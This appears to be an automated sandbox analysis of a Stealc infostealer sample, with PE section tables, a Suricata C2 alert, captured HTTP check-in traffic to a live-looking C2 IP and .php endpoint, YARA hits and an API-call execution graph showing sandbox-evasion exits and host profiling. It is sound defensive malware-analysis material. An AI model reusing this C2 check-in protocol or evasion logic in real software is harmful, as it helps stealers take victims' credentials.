                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      0x10000x2490000x16200a9439ad7179057796523c4e89a5d94d6unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0x24a0000x2b00x200cc5ecbfc3bc168b68ae19bffea085feeFalse0.80078125data6.042198740655303IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      0x24c0000x2a90000x200a3745a7361aa2b01bf6ec3c52a99cb06unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      cdtaybca0x4f50000x19e0000x19d200888f974a9f32bddeb80721bf3d98ee3fFalse0.9947091291603631data7.954402034291771IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      xngaqtmq0x6930000x10000x60088c697e5035d1a465428eb6a732dc8dcFalse0.572265625data5.007051868286875IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .taggant0x6940000x30000x22003060c331b79ff848e2126e4b6ce096eaFalse0.05801930147058824DOS executable (COM)0.6280276240339996IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_MANIFEST0x691e340x256ASCII text, with CRLF line terminators0.5100334448160535

                      Imports

                      DLLImport
                      kernel32.dlllstrcpy

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2024-11-24T03:04:07.818374+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.20680TCP

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Nov 24, 2024 03:04:05.845278978 CET4973080192.168.2.4185.215.113.206
                      Nov 24, 2024 03:04:05.964823961 CET8049730185.215.113.206192.168.2.4
                      Nov 24, 2024 03:04:05.964930058 CET4973080192.168.2.4185.215.113.206
                      Nov 24, 2024 03:04:05.965117931 CET4973080192.168.2.4185.215.113.206
                      Nov 24, 2024 03:04:06.084629059 CET8049730185.215.113.206192.168.2.4
                      Nov 24, 2024 03:04:07.357278109 CET8049730185.215.113.206192.168.2.4
                      Nov 24, 2024 03:04:07.357348919 CET4973080192.168.2.4185.215.113.206
                      Nov 24, 2024 03:04:07.359994888 CET4973080192.168.2.4185.215.113.206
                      Nov 24, 2024 03:04:07.479418993 CET8049730185.215.113.206192.168.2.4
                      Nov 24, 2024 03:04:07.818291903 CET8049730185.215.113.206192.168.2.4
                      Nov 24, 2024 03:04:07.818373919 CET4973080192.168.2.4185.215.113.206
                      Nov 24, 2024 03:04:09.915075064 CET4973080192.168.2.4185.215.113.206

                      HTTP Request Dependency Graph

                      • 185.215.113.206

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.449730185.215.113.206807148C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Nov 24, 2024 03:04:05.965117931 CET90OUTGET / HTTP/1.1
                      Host: 185.215.113.206
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Nov 24, 2024 03:04:07.357278109 CET203INHTTP/1.1 200 OK
                      Date: Sun, 24 Nov 2024 02:04:07 GMT
                      Server: Apache/2.4.41 (Ubuntu)
                      Content-Length: 0
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Nov 24, 2024 03:04:07.359994888 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----CBAKJKJJJECFIEBFHIEG
                      Host: 185.215.113.206
                      Content-Length: 211
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Data Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 31 41 37 32 43 37 45 41 45 31 39 33 34 36 38 35 35 32 38 34 39 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 2d 2d 0d 0a
                      Data Ascii: ------CBAKJKJJJECFIEBFHIEGContent-Disposition: form-data; name="hwid"E1A72C7EAE193468552849------CBAKJKJJJECFIEBFHIEGContent-Disposition: form-data; name="build"mars------CBAKJKJJJECFIEBFHIEG--
                      Nov 24, 2024 03:04:07.818291903 CET210INHTTP/1.1 200 OK
                      Date: Sun, 24 Nov 2024 02:04:07 GMT
                      Server: Apache/2.4.41 (Ubuntu)
                      Content-Length: 8
                      Keep-Alive: timeout=5, max=99
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 59 6d 78 76 59 32 73 3d
                      Data Ascii: YmxvY2s=


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      System Behavior

                      General

                      Target ID:0
                      Start time:21:04:02
                      Start date:23/11/2024
                      Path:C:\Users\user\Desktop\file.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\file.exe"
                      Imagebase:0x440000
                      File size:1'798'656 bytes
                      MD5 hash:3FEEA8FF886F1FC0D57DA4A2B3A109BA
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1745302032.000000000156E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1701395564.0000000005180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:5.1%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:16.3%
                        Total number of Nodes:1405
                        Total number of Limit Nodes:28
                        execution_graph 27288 458615 49 API calls 27263 463cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27303 4633c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27253 45e049 147 API calls 27304 458615 48 API calls 27289 4672ef lstrcpy lstrcat 27254 462853 lstrcpy 27264 462cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27275 453959 244 API calls 27279 4501d9 126 API calls 27276 462d60 11 API calls 27290 46a280 __CxxFrameHandler 27291 462b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 27282 451269 408 API calls 27255 445869 57 API calls 27256 454c77 296 API calls 25816 461bf0 25868 442a90 25816->25868 25820 461c03 25821 461c29 lstrcpy 25820->25821 25822 461c35 25820->25822 25821->25822 25823 461c65 ExitProcess 25822->25823 25824 461c6d GetSystemInfo 25822->25824 25825 461c85 25824->25825 25826 461c7d ExitProcess 25824->25826 25969 441030 GetCurrentProcess VirtualAllocExNuma 25825->25969 25831 461ca2 25832 461cb8 25831->25832 25833 461cb0 ExitProcess 25831->25833 25981 462ad0 GetProcessHeap RtlAllocateHeap GetComputerNameA 25832->25981 25835 461ce7 lstrlen 25841 461cff 25835->25841 25836 461cbd 25836->25835 26190 462a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25836->26190 25838 461cd1 25838->25835 25842 461ce0 ExitProcess 25838->25842 25839 461d23 lstrlen 25840 461d39 25839->25840 25844 461d5a 25840->25844 25845 461d46 lstrcpy lstrcat 25840->25845 25841->25839 25843 461d13 lstrcpy lstrcat 25841->25843 25843->25839 25846 462ad0 3 API calls 25844->25846 25845->25844 25847 461d5f lstrlen 25846->25847 25849 461d74 25847->25849 25848 461d9a lstrlen 25850 461db0 25848->25850 25849->25848 25851 461d87 lstrcpy lstrcat 25849->25851 25852 461dce 25850->25852 25853 461dba lstrcpy lstrcat 25850->25853 25851->25848 25983 462a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25852->25983 25853->25852 25855 461dd3 lstrlen 25856 461de7 25855->25856 25857 461df7 lstrcpy lstrcat 25856->25857 25858 461e0a 25856->25858 25857->25858 25859 461e28 lstrcpy 25858->25859 25860 461e30 25858->25860 25859->25860 25861 461e56 OpenEventA 25860->25861 25862 461e8c CreateEventA 25861->25862 25863 461e68 CloseHandle Sleep OpenEventA 25861->25863 25984 461b20 GetSystemTime 25862->25984 25863->25862 25863->25863 25867 461ea5 CloseHandle ExitProcess 26191 444a60 25868->26191 25870 442aa1 25871 444a60 2 API calls 25870->25871 25872 442ab7 25871->25872 25873 444a60 2 API calls 25872->25873 25874 442acd 25873->25874 25875 444a60 2 API calls 25874->25875 25876 442ae3 25875->25876 25877 444a60 2 API calls 25876->25877 25878 442af9 25877->25878 25879 444a60 2 API calls 25878->25879 25880 442b0f 25879->25880 25881 444a60 2 API calls 25880->25881 25882 442b28 25881->25882 25883 444a60 2 API calls 25882->25883 25884 442b3e 25883->25884 25885 444a60 2 API calls 25884->25885 25886 442b54 25885->25886 25887 444a60 2 API calls 25886->25887 25888 442b6a 25887->25888 25889 444a60 2 API calls 25888->25889 25890 442b80 25889->25890 25891 444a60 2 API calls 25890->25891 25892 442b96 25891->25892 25893 444a60 2 API calls 25892->25893 25894 442baf 25893->25894 25895 444a60 2 API calls 25894->25895 25896 442bc5 25895->25896 25897 444a60 2 API calls 25896->25897 25898 442bdb 25897->25898 25899 444a60 2 API calls 25898->25899 25900 442bf1 25899->25900 25901 444a60 2 API calls 25900->25901 25902 442c07 25901->25902 25903 444a60 2 API calls 25902->25903 25904 442c1d 25903->25904 25905 444a60 2 API calls 25904->25905 25906 442c36 25905->25906 25907 444a60 2 API calls 25906->25907 25908 442c4c 25907->25908 25909 444a60 2 API calls 25908->25909 25910 442c62 25909->25910 25911 444a60 2 API calls 25910->25911 25912 442c78 25911->25912 25913 444a60 2 API calls 25912->25913 25914 442c8e 25913->25914 25915 444a60 2 API calls 25914->25915 25916 442ca4 25915->25916 25917 444a60 2 API calls 25916->25917 25918 442cbd 25917->25918 25919 444a60 2 API calls 25918->25919 25920 442cd3 25919->25920 25921 444a60 2 API calls 25920->25921 25922 442ce9 25921->25922 25923 444a60 2 API calls 25922->25923 25924 442cff 25923->25924 25925 444a60 2 API calls 25924->25925 25926 442d15 25925->25926 25927 444a60 2 API calls 25926->25927 25928 442d2b 25927->25928 25929 444a60 2 API calls 25928->25929 25930 442d44 25929->25930 25931 444a60 2 API calls 25930->25931 25932 442d5a 25931->25932 25933 444a60 2 API calls 25932->25933 25934 442d70 25933->25934 25935 444a60 2 API calls 25934->25935 25936 442d86 25935->25936 25937 444a60 2 API calls 25936->25937 25938 442d9c 25937->25938 25939 444a60 2 API calls 25938->25939 25940 442db2 25939->25940 25941 444a60 2 API calls 25940->25941 25942 442dcb 25941->25942 25943 444a60 2 API calls 25942->25943 25944 442de1 25943->25944 25945 444a60 2 API calls 25944->25945 25946 442df7 25945->25946 25947 444a60 2 API calls 25946->25947 25948 442e0d 25947->25948 25949 444a60 2 API calls 25948->25949 25950 442e23 25949->25950 25951 444a60 2 API calls 25950->25951 25952 442e39 25951->25952 25953 444a60 2 API calls 25952->25953 25954 442e52 25953->25954 25955 466390 GetPEB 25954->25955 25956 4665c3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 25955->25956 25957 4663c3 25955->25957 25958 466625 GetProcAddress 25956->25958 25959 466638 25956->25959 25966 4663d7 20 API calls 25957->25966 25958->25959 25960 466641 GetProcAddress GetProcAddress 25959->25960 25961 46666c 25959->25961 25960->25961 25962 466675 GetProcAddress 25961->25962 25963 466688 25961->25963 25962->25963 25964 4666a4 25963->25964 25965 466691 GetProcAddress 25963->25965 25967 4666d7 25964->25967 25968 4666ad GetProcAddress GetProcAddress 25964->25968 25965->25964 25966->25956 25967->25820 25968->25967 25970 441057 ExitProcess 25969->25970 25971 44105e VirtualAlloc 25969->25971 25972 44107d 25971->25972 25973 4410b1 25972->25973 25974 44108a VirtualFree 25972->25974 25975 4410c0 25973->25975 25974->25973 25976 4410d0 GlobalMemoryStatusEx 25975->25976 25978 4410f5 25976->25978 25979 441112 ExitProcess 25976->25979 25978->25979 25980 44111a GetUserDefaultLangID 25978->25980 25980->25831 25980->25832 25982 462b24 25981->25982 25982->25836 25983->25855 26196 461820 25984->26196 25986 461b81 sscanf 26235 442a20 25986->26235 25989 461bd6 25990 461be9 25989->25990 25991 461be2 ExitProcess 25989->25991 25992 45ffd0 25990->25992 25993 45ffe0 25992->25993 25994 46000d lstrcpy 25993->25994 25995 460019 lstrlen 25993->25995 25994->25995 25996 4600d0 25995->25996 25997 4600e7 lstrlen 25996->25997 25998 4600db lstrcpy 25996->25998 25999 4600ff 25997->25999 25998->25997 26000 460116 lstrlen 25999->26000 26001 46010a lstrcpy 25999->26001 26002 46012e 26000->26002 26001->26000 26003 460145 26002->26003 26004 460139 lstrcpy 26002->26004 26237 461570 26003->26237 26004->26003 26007 46016e 26008 460183 lstrcpy 26007->26008 26009 46018f lstrlen 26007->26009 26008->26009 26010 4601a8 26009->26010 26011 4601bd lstrcpy 26010->26011 26012 4601c9 lstrlen 26010->26012 26011->26012 26013 4601e8 26012->26013 26014 460200 lstrcpy 26013->26014 26015 46020c lstrlen 26013->26015 26014->26015 26016 46026a 26015->26016 26017 460282 lstrcpy 26016->26017 26018 46028e 26016->26018 26017->26018 26247 442e70 26018->26247 26026 460540 26027 461570 4 API calls 26026->26027 26028 46054f 26027->26028 26029 4605a1 lstrlen 26028->26029 26030 460599 lstrcpy 26028->26030 26031 4605bf 26029->26031 26030->26029 26032 4605d1 lstrcpy lstrcat 26031->26032 26033 4605e9 26031->26033 26032->26033 26034 460614 26033->26034 26035 46060c lstrcpy 26033->26035 26036 46061b lstrlen 26034->26036 26035->26034 26037 460636 26036->26037 26038 46064a lstrcpy lstrcat 26037->26038 26039 460662 26037->26039 26038->26039 26040 460687 26039->26040 26041 46067f lstrcpy 26039->26041 26042 46068e lstrlen 26040->26042 26041->26040 26043 4606b3 26042->26043 26044 4606c7 lstrcpy lstrcat 26043->26044 26045 4606db 26043->26045 26044->26045 26046 460704 lstrcpy 26045->26046 26047 46070c 26045->26047 26046->26047 26048 460751 26047->26048 26049 460749 lstrcpy 26047->26049 27003 462740 GetWindowsDirectoryA 26048->27003 26049->26048 26051 460785 27012 444c50 26051->27012 26052 46075d 26052->26051 26054 46077d lstrcpy 26052->26054 26054->26051 26055 46078f 27166 458ca0 StrCmpCA 26055->27166 26057 46079b 26058 441530 8 API calls 26057->26058 26059 4607bc 26058->26059 26060 4607e5 lstrcpy 26059->26060 26061 4607ed 26059->26061 26060->26061 27184 4460d0 80 API calls 26061->27184 26063 4607fa 27185 4581b0 10 API calls 26063->27185 26065 460809 26066 441530 8 API calls 26065->26066 26067 46082f 26066->26067 26068 460856 lstrcpy 26067->26068 26069 46085e 26067->26069 26068->26069 27186 4460d0 80 API calls 26069->27186 26071 46086b 27187 457ee0 lstrlen lstrcpy StrCmpCA StrCmpCA StrCmpCA 26071->27187 26073 460876 26074 441530 8 API calls 26073->26074 26075 4608a1 26074->26075 26076 4608d5 26075->26076 26077 4608c9 lstrcpy 26075->26077 27188 4460d0 80 API calls 26076->27188 26077->26076 26079 4608db 27189 458050 lstrlen lstrcpy StrCmpCA lstrlen lstrcpy 26079->27189 26081 4608e6 26082 441530 8 API calls 26081->26082 26083 4608f7 26082->26083 26084 460926 lstrcpy 26083->26084 26085 46092e 26083->26085 26084->26085 27190 445640 8 API calls 26085->27190 26087 460933 26088 441530 8 API calls 26087->26088 26089 46094c 26088->26089 27191 457280 1499 API calls 26089->27191 26091 46099f 26092 441530 8 API calls 26091->26092 26093 4609cf 26092->26093 26094 4609f6 lstrcpy 26093->26094 26095 4609fe 26093->26095 26094->26095 27192 4460d0 80 API calls 26095->27192 26097 460a0b 27193 4583e0 7 API calls 26097->27193 26099 460a18 26100 441530 8 API calls 26099->26100 26101 460a29 26100->26101 27194 4424e0 230 API calls 26101->27194 26103 460a6b 26104 460b40 26103->26104 26105 460a7f 26103->26105 26107 441530 8 API calls 26104->26107 26106 441530 8 API calls 26105->26106 26108 460aa5 26106->26108 26110 460b59 26107->26110 26111 460ad4 26108->26111 26112 460acc lstrcpy 26108->26112 26109 460b87 27198 4460d0 80 API calls 26109->27198 26110->26109 26113 460b7f lstrcpy 26110->26113 27195 4460d0 80 API calls 26111->27195 26112->26111 26113->26109 26116 460b8d 27199 45c840 70 API calls 26116->27199 26117 460ada 27196 4585b0 47 API calls 26117->27196 26120 460b38 26123 460bd1 26120->26123 26126 441530 8 API calls 26120->26126 26121 460ae5 26122 441530 8 API calls 26121->26122 26125 460af6 26122->26125 26124 460bfa 26123->26124 26127 441530 8 API calls 26123->26127 26128 460c23 26124->26128 26132 441530 8 API calls 26124->26132 27197 45d0f0 118 API calls 26125->27197 26130 460bb9 26126->26130 26131 460bf5 26127->26131 26134 460c4c 26128->26134 26139 441530 8 API calls 26128->26139 27200 45d7b0 104 API calls 26130->27200 27202 45dfa0 149 API calls 26131->27202 26137 460c1e 26132->26137 26135 460c75 26134->26135 26141 441530 8 API calls 26134->26141 26142 460c9e 26135->26142 26148 441530 8 API calls 26135->26148 27203 45e500 108 API calls 26137->27203 26138 460bbe 26144 441530 8 API calls 26138->26144 26140 460c47 26139->26140 27204 45e720 120 API calls 26140->27204 26147 460c70 26141->26147 26145 460cc7 26142->26145 26150 441530 8 API calls 26142->26150 26149 460bcc 26144->26149 26151 460cf0 26145->26151 26156 441530 8 API calls 26145->26156 27205 45e9e0 110 API calls 26147->27205 26153 460c99 26148->26153 27201 45ecb0 98 API calls 26149->27201 26155 460cc2 26150->26155 26157 460d04 26151->26157 26158 460dca 26151->26158 27206 447bc0 152 API calls 26153->27206 27207 45eb70 108 API calls 26155->27207 26161 460ceb 26156->26161 26162 441530 8 API calls 26157->26162 26163 441530 8 API calls 26158->26163 27208 4641e0 91 API calls 26161->27208 26167 460d2a 26162->26167 26166 460de3 26163->26166 26165 460e11 27212 4460d0 80 API calls 26165->27212 26166->26165 26168 460e09 lstrcpy 26166->26168 26169 460d56 lstrcpy 26167->26169 26170 460d5e 26167->26170 26168->26165 26169->26170 27209 4460d0 80 API calls 26170->27209 26173 460e17 27213 45c840 70 API calls 26173->27213 26174 460d64 27210 4585b0 47 API calls 26174->27210 26177 460dc2 26180 441530 8 API calls 26177->26180 26178 460d6f 26179 441530 8 API calls 26178->26179 26181 460d80 26179->26181 26184 460e39 26180->26184 27211 45d0f0 118 API calls 26181->27211 26183 460e67 27214 4460d0 80 API calls 26183->27214 26184->26183 26185 460e5f lstrcpy 26184->26185 26185->26183 26187 460e74 26189 460e95 26187->26189 27215 461660 12 API calls 26187->27215 26189->25867 26190->25838 26192 444a76 RtlAllocateHeap 26191->26192 26195 444ab4 VirtualProtect 26192->26195 26195->25870 26197 46182e 26196->26197 26198 461855 lstrlen 26197->26198 26199 461849 lstrcpy 26197->26199 26200 461873 26198->26200 26199->26198 26201 461885 lstrcpy lstrcat 26200->26201 26202 461898 26200->26202 26201->26202 26203 4618bf lstrcpy 26202->26203 26204 4618c7 26202->26204 26203->26204 26205 4618ce lstrlen 26204->26205 26206 4618e6 26205->26206 26207 4618f2 lstrcpy lstrcat 26206->26207 26208 461906 26206->26208 26207->26208 26209 461935 26208->26209 26210 46192d lstrcpy 26208->26210 26211 46193c lstrlen 26209->26211 26210->26209 26212 461958 26211->26212 26213 46196a lstrcpy lstrcat 26212->26213 26214 46197d 26212->26214 26213->26214 26215 4619ac 26214->26215 26216 4619a4 lstrcpy 26214->26216 26217 4619b3 lstrlen 26215->26217 26216->26215 26218 4619cb 26217->26218 26219 4619d7 lstrcpy lstrcat 26218->26219 26220 4619eb 26218->26220 26219->26220 26221 461a1a 26220->26221 26222 461a12 lstrcpy 26220->26222 26223 461a21 lstrlen 26221->26223 26222->26221 26224 461a3d 26223->26224 26225 461a4f lstrcpy lstrcat 26224->26225 26226 461a62 26224->26226 26225->26226 26227 461a91 26226->26227 26228 461a89 lstrcpy 26226->26228 26229 461a98 lstrlen 26227->26229 26228->26227 26230 461ab4 26229->26230 26231 461ac6 lstrcpy lstrcat 26230->26231 26232 461ad9 26230->26232 26231->26232 26233 461b08 26232->26233 26234 461b00 lstrcpy 26232->26234 26233->25986 26234->26233 26236 442a24 SystemTimeToFileTime SystemTimeToFileTime 26235->26236 26236->25989 26236->25990 26238 46157f 26237->26238 26239 46159f lstrcpy 26238->26239 26240 4615a7 26238->26240 26239->26240 26241 4615d7 lstrcpy 26240->26241 26242 4615df 26240->26242 26241->26242 26243 46160f lstrcpy 26242->26243 26244 461617 26242->26244 26243->26244 26245 460155 lstrlen 26244->26245 26246 461647 lstrcpy 26244->26246 26245->26007 26246->26245 26248 444a60 2 API calls 26247->26248 26249 442e82 26248->26249 26250 444a60 2 API calls 26249->26250 26251 442ea0 26250->26251 26252 444a60 2 API calls 26251->26252 26253 442eb6 26252->26253 26254 444a60 2 API calls 26253->26254 26255 442ecb 26254->26255 26256 444a60 2 API calls 26255->26256 26257 442eec 26256->26257 26258 444a60 2 API calls 26257->26258 26259 442f01 26258->26259 26260 444a60 2 API calls 26259->26260 26261 442f19 26260->26261 26262 444a60 2 API calls 26261->26262 26263 442f3a 26262->26263 26264 444a60 2 API calls 26263->26264 26265 442f4f 26264->26265 26266 444a60 2 API calls 26265->26266 26267 442f65 26266->26267 26268 444a60 2 API calls 26267->26268 26269 442f7b 26268->26269 26270 444a60 2 API calls 26269->26270 26271 442f91 26270->26271 26272 444a60 2 API calls 26271->26272 26273 442faa 26272->26273 26274 444a60 2 API calls 26273->26274 26275 442fc0 26274->26275 26276 444a60 2 API calls 26275->26276 26277 442fd6 26276->26277 26278 444a60 2 API calls 26277->26278 26279 442fec 26278->26279 26280 444a60 2 API calls 26279->26280 26281 443002 26280->26281 26282 444a60 2 API calls 26281->26282 26283 443018 26282->26283 26284 444a60 2 API calls 26283->26284 26285 443031 26284->26285 26286 444a60 2 API calls 26285->26286 26287 443047 26286->26287 26288 444a60 2 API calls 26287->26288 26289 44305d 26288->26289 26290 444a60 2 API calls 26289->26290 26291 443073 26290->26291 26292 444a60 2 API calls 26291->26292 26293 443089 26292->26293 26294 444a60 2 API calls 26293->26294 26295 44309f 26294->26295 26296 444a60 2 API calls 26295->26296 26297 4430b8 26296->26297 26298 444a60 2 API calls 26297->26298 26299 4430ce 26298->26299 26300 444a60 2 API calls 26299->26300 26301 4430e4 26300->26301 26302 444a60 2 API calls 26301->26302 26303 4430fa 26302->26303 26304 444a60 2 API calls 26303->26304 26305 443110 26304->26305 26306 444a60 2 API calls 26305->26306 26307 443126 26306->26307 26308 444a60 2 API calls 26307->26308 26309 44313f 26308->26309 26310 444a60 2 API calls 26309->26310 26311 443155 26310->26311 26312 444a60 2 API calls 26311->26312 26313 44316b 26312->26313 26314 444a60 2 API calls 26313->26314 26315 443181 26314->26315 26316 444a60 2 API calls 26315->26316 26317 443197 26316->26317 26318 444a60 2 API calls 26317->26318 26319 4431ad 26318->26319 26320 444a60 2 API calls 26319->26320 26321 4431c6 26320->26321 26322 444a60 2 API calls 26321->26322 26323 4431dc 26322->26323 26324 444a60 2 API calls 26323->26324 26325 4431f2 26324->26325 26326 444a60 2 API calls 26325->26326 26327 443208 26326->26327 26328 444a60 2 API calls 26327->26328 26329 44321e 26328->26329 26330 444a60 2 API calls 26329->26330 26331 443234 26330->26331 26332 444a60 2 API calls 26331->26332 26333 44324d 26332->26333 26334 444a60 2 API calls 26333->26334 26335 443263 26334->26335 26336 444a60 2 API calls 26335->26336 26337 443279 26336->26337 26338 444a60 2 API calls 26337->26338 26339 44328f 26338->26339 26340 444a60 2 API calls 26339->26340 26341 4432a5 26340->26341 26342 444a60 2 API calls 26341->26342 26343 4432bb 26342->26343 26344 444a60 2 API calls 26343->26344 26345 4432d4 26344->26345 26346 444a60 2 API calls 26345->26346 26347 4432ea 26346->26347 26348 444a60 2 API calls 26347->26348 26349 443300 26348->26349 26350 444a60 2 API calls 26349->26350 26351 443316 26350->26351 26352 444a60 2 API calls 26351->26352 26353 44332c 26352->26353 26354 444a60 2 API calls 26353->26354 26355 443342 26354->26355 26356 444a60 2 API calls 26355->26356 26357 44335b 26356->26357 26358 444a60 2 API calls 26357->26358 26359 443371 26358->26359 26360 444a60 2 API calls 26359->26360 26361 443387 26360->26361 26362 444a60 2 API calls 26361->26362 26363 44339d 26362->26363 26364 444a60 2 API calls 26363->26364 26365 4433b3 26364->26365 26366 444a60 2 API calls 26365->26366 26367 4433c9 26366->26367 26368 444a60 2 API calls 26367->26368 26369 4433e2 26368->26369 26370 444a60 2 API calls 26369->26370 26371 4433f8 26370->26371 26372 444a60 2 API calls 26371->26372 26373 44340e 26372->26373 26374 444a60 2 API calls 26373->26374 26375 443424 26374->26375 26376 444a60 2 API calls 26375->26376 26377 44343a 26376->26377 26378 444a60 2 API calls 26377->26378 26379 443450 26378->26379 26380 444a60 2 API calls 26379->26380 26381 443469 26380->26381 26382 444a60 2 API calls 26381->26382 26383 44347f 26382->26383 26384 444a60 2 API calls 26383->26384 26385 443495 26384->26385 26386 444a60 2 API calls 26385->26386 26387 4434ab 26386->26387 26388 444a60 2 API calls 26387->26388 26389 4434c1 26388->26389 26390 444a60 2 API calls 26389->26390 26391 4434d7 26390->26391 26392 444a60 2 API calls 26391->26392 26393 4434f0 26392->26393 26394 444a60 2 API calls 26393->26394 26395 443506 26394->26395 26396 444a60 2 API calls 26395->26396 26397 44351c 26396->26397 26398 444a60 2 API calls 26397->26398 26399 443532 26398->26399 26400 444a60 2 API calls 26399->26400 26401 443548 26400->26401 26402 444a60 2 API calls 26401->26402 26403 44355e 26402->26403 26404 444a60 2 API calls 26403->26404 26405 443577 26404->26405 26406 444a60 2 API calls 26405->26406 26407 44358d 26406->26407 26408 444a60 2 API calls 26407->26408 26409 4435a3 26408->26409 26410 444a60 2 API calls 26409->26410 26411 4435b9 26410->26411 26412 444a60 2 API calls 26411->26412 26413 4435cf 26412->26413 26414 444a60 2 API calls 26413->26414 26415 4435e5 26414->26415 26416 444a60 2 API calls 26415->26416 26417 4435fe 26416->26417 26418 444a60 2 API calls 26417->26418 26419 443614 26418->26419 26420 444a60 2 API calls 26419->26420 26421 44362a 26420->26421 26422 444a60 2 API calls 26421->26422 26423 443640 26422->26423 26424 444a60 2 API calls 26423->26424 26425 443656 26424->26425 26426 444a60 2 API calls 26425->26426 26427 44366c 26426->26427 26428 444a60 2 API calls 26427->26428 26429 443685 26428->26429 26430 444a60 2 API calls 26429->26430 26431 44369b 26430->26431 26432 444a60 2 API calls 26431->26432 26433 4436b1 26432->26433 26434 444a60 2 API calls 26433->26434 26435 4436c7 26434->26435 26436 444a60 2 API calls 26435->26436 26437 4436dd 26436->26437 26438 444a60 2 API calls 26437->26438 26439 4436f3 26438->26439 26440 444a60 2 API calls 26439->26440 26441 44370c 26440->26441 26442 444a60 2 API calls 26441->26442 26443 443722 26442->26443 26444 444a60 2 API calls 26443->26444 26445 443738 26444->26445 26446 444a60 2 API calls 26445->26446 26447 44374e 26446->26447 26448 444a60 2 API calls 26447->26448 26449 443764 26448->26449 